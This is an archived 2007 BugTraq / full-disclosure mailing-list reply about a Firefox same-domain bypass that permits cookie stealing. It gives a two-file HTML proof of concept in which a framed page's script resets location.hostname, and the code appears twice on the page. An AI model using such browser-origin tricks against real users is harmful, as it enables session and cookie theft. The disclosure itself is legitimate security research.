BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
Feb 15 2007 03:25PM
pdp (architect) (pdp gnucitizen googlemail com)
weird, firefox slowly dies out
t2.html
<html>
<body>
<iframe src="t1.html"></iframe>
</body>
</html>
t1.html
<html>
<body>
<script>location.hostname="blog.com";</script>
</body>
</html>
On 2/15/07, pdp (architect) <pdp.gnucitizen (at) googlemail (dot) com [email concealed]> wrote:
> the first one runs in about:blank...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
t2.html
<html>
<body>
<iframe src="t1.html"></iframe>
</body>
</html>
t1.html
<html>
<body>
<script>location.hostname="blog.com";</script>
</body>
</html>
On 2/15/07, pdp (architect) <pdp.gnucitizen (at) googlemail (dot) com [email concealed]> wrote:
> the first one runs in about:blank...
[ more ]